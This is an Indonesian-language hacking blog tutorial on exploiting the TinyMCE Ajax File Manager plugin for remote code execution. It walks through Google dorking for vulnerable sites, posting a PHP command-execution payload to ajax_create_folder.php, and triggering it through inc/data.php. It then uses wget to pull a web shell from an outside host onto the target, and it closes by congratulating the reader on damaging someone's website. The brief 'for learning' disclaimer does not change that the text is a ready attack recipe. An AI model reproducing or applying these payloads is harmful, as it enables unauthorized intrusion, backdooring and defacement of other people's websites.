Lorem ipsum dolor sit amet, consectetur adipiscing elit. Test link

Exploit TinyMCE Ajax File Manager Remote Code Execution

Exploit TinyMCE Ajax File Manager Remote Code Execution

Assalamualaikum Wr.Wb
Baiklah kembali lagi dengan saya Mr.Adewa
Pada kali ini saya akan memberikan Tutorial Exploit TinyMCE Ajax File Manager Remote Code Execution

Sebelum itu kita harus mempersiapkan sesuatu
-Shel
Gunakan shel IndoXploit aja

-Hackbar (COMOT AHH)

Baiklah langsung saja kita mulai
1. Dorking dulu di google (Mana tau dapat yg vuln)

2. Jika sudah masukkan exploitnya [patch]/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php jika vuln akan ada seperti di bawah ini


3. Instal hackbar dulu di moziila kalian, kemudian masukkan link tadi ke hackbar

4. Contrend atau ceklis bagian post data, masukkan exploitnya/command untuk kita lakukan RCE

foo=<?php error_reporting(0);print(system('tes'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>

Command nanti tempat untuk melakukan RCE Atau Remote Code Excution

5. Bagian command coba kita ganti dengan ls
ls (Berguna untuk menampilkan isi dir
Contoh

foo=<?php error_reporting(0);print(system('ls'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>

6. Kemudian buka tab baru dan masukkan link tadi dan tambahkan inc/data.php
seperti
[patch]/tinymce/plugins/ajaxfilemanager/inc/data.php
Maka perintah ls tadi akan keluar di sana


7. Masih banyak lagi command RCE, Karena saya mau menupload sebuah backdoor atau shel langsung saja kita gunakan Command ini
wget https://linkwebsiteygudahadabackdooornyaataushel.com/namafile.txt -O namashelygingindibuat.php


8. Buka lagi tab baru dan masukkan url target.co.li/tinymce/plugins/ajaxfilemanager/namasheltadi.php

9. Selamat anda telah berhasil merusak website seseorang. Selanjutnya terserah kalian deh mau di apakan


Mungkin itulah sedikit penjelasan mengenai "Exploit TinyMCE Ajax File Manager Remote Code Execution"
Jika kurang paham kalian bisa bertanya di bawah ini

Jika kurang paham nonton aja video di bawah ini


Sekian dan Terimakasih
Segala sesuatu di tanggung sendiri, blog ini di buat untuk belajar bersama
Wassalamualaikum Wr.Wb

Post a Comment

© Adewakun. All rights reserved. Premium By Raushan Design